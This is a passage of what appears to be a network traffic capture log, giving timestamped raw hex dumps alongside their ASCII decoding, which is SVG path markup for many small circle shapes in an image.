                                                                                                                                                                                                                                                                          Data Ascii: 77,225.59a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M49.47,216.82a2.17,2.17,0,0,1-1,2.82,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16339INData Raw: 22 20 64 3d 22 4d 38 38 2e 34 32 2c 33 31 32 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 38 38 2e 31 32 2c 33 30 33 2e 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 41 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2c 38 32 2e 39 2c 33 30 35 61 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: " d="M88.42,312.18a2.18,2.18,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M88.12,303.4a2.19,2.19,0,0,1-1,2.83A3.2,3.2,0,0,1,82.9,305a3,3,0,0,1,.65-3.65,2.86,2.86,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16355INData Raw: 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 30 39 2e 38 33 2c 31 35 33 2e 32 35 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20
                                                                                                                                                                                                                                                                          Data Ascii: 1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M109.83,153.25a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16371INData Raw: 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 37 37 2c 32 34 38 2e 36 31 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 34 37 2c 32 33 39 2e 38 33 61
                                                                                                                                                                                                                                                                          Data Ascii: 2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.77,248.61a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.47,239.83a
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16387INData Raw: 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 34 38 2c 39 38 2e 34 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 31 38 2c 38 39 2e 36 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32
                                                                                                                                                                                                                                                                          Data Ascii: 69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.48,98.46a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.18,89.69a2.16,2.16,0,0,1-1,2.82
                                                                                                                                                                                                                                                                          2023-07-05 06:07:56 UTC16477INData Raw: 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 34 32 2c 31 39 33 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 31 33 2c 31 38 35 2e 30 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38
                                                                                                                                                                                                                                                                          Data Ascii: ,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M209.42,193.82a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M209.13,185.05a2.17,2.17,0,0,1-1,2.82,3.18
                                                                                                                                                                                                                                                                          2023-07-05 06:07:56 UTC16493INData Raw: 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 33 37 2c 32 38 39 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 30 37 2c 32 38 30 2e 34 31 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37
                                                                                                                                                                                                                                                                          Data Ascii: 9,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.37,289.18a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.07,280.41a2.16,2.16,0,0,1-1,2.82,3.17,3.17
                                                                                                                                                                                                                                                                          2023-07-05 06:07:56 UTC16509INData Raw: 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 37 30 2e 30 38 2c 31 33 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 36 39 2e 37 38 2c 31 33 30 2e 32 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d
                                                                                                                                                                                                                                                                          Data Ascii: "></path><path class="cls-7" d="M270.08,139a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M269.78,130.26a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:56 UTC16525INData Raw: 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 30 39 2c 32 33 34 2e 34 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 30 38 2e 37 32 2c 32 32 35 2e 36 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                          Data Ascii: h><path class="cls-7" d="M309,234.4a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M308.72,225.62a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:56 UTC16541INData Raw: 3d 22 4d 33 33 30 2e 37 33 2c 38 34 2e 32 35 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 34 37 2e 36 37 2c 33 32 31 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: ="M330.73,84.25a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.87,2.87,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M347.67,321a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:56 UTC16557INData Raw: 20 64 3d 22 4d 33 36 39 2e 36 37 2c 31 37 39 2e 36 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 39 2e 33 38 2c 31 37 30 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: d="M369.67,179.61a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.87,2.87,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M369.38,170.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:56 UTC16573INData Raw: 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 31 31 2e 37 2c 33 33 39 2e 31 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                                          Data Ascii: 09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M311.7,339.13a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.18,3.32"></path><path class=
                                                                                                                                                                                                                                                                          2023-07-05 06:07:56 UTC16589INData Raw: 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 31 2e 34 2c 31 39 32 2e 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 31 2e 31 33 2c 31 38 34 2e 38 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38
                                                                                                                                                                                                                                                                          Data Ascii: 3.32"></path><path class="cls-9" d="M331.4,192.9a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0,1,.18,3.33"></path><path class="cls-9" d="M331.13,184.83a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:56 UTC16605INData Raw: 36 37 2c 32 37 32 2e 35 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 36 2e 36 39 2c 32 36 34 2e 34 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                                          Data Ascii: 67,272.57a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.19,3.33"></path><path class="cls-9" d="M366.69,264.49a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.59-3.37,2.63,2.63,0,0,1,3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:56 UTC16621INData Raw: 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 32 2e 32 35 2c 33 34 34 2e 31 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 32 2c 33 33 36 2e 30 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: ,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M402.25,344.16a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M402,336.08a2,2,0,0,1-.9,2.6,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:56 UTC16637INData Raw: 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 31 2e 36 37 2c 31 38 39 2e 38 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61
                                                                                                                                                                                                                                                                          Data Ascii: -3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M421.67,189.85a2,2,0,0,1-.9,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><pa
                                                                                                                                                                                                                                                                          2023-07-05 06:07:56 UTC16653INData Raw: 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 35 37 2e 32 33 2c 32 36 39 2e 35 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 35 37 2c 32 36 31 2e 34 34 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c
                                                                                                                                                                                                                                                                          Data Ascii: "></path><path class="cls-9" d="M457.23,269.51a2,2,0,0,1-.9,2.61,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M457,261.44a2,2,0,0,1-.91,2.6,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:56 UTC16669INData Raw: 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 35 32 2c 33 34 31 2e 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 32 35 2c 33 33 33 61 32 2c 32 2c 30 2c 30
